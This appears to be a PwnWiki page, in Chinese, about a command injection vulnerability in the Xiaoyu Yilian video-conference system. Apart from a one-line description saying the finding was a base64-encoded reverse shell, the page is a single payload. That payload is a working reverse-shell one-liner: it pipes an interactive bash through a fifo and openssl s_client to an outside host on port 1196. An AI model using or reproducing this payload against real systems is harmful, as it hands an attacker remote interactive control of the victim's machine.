小魚易連視頻會議系統命令注入漏洞

From PwnWiki

Revision as of 18:55, 2 May 2021 by Pwnwiki (talk | contribs) (Created page with "==描述== 特徵發現：匹配規則base64編碼解碼特徵（存在反彈shell） ==Payload== <pre> mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -con...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

描述

特徵發現：匹配規則base64編碼

解碼特徵（存在反彈shell）

Payload

mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect 172.31.0.1:1196 > /tmp/s;rm -f /tmp/s

Retrieved from "https://pwnwiki.com/index.php?title=小魚易連視頻會議系統命令注入漏洞&oldid=2046"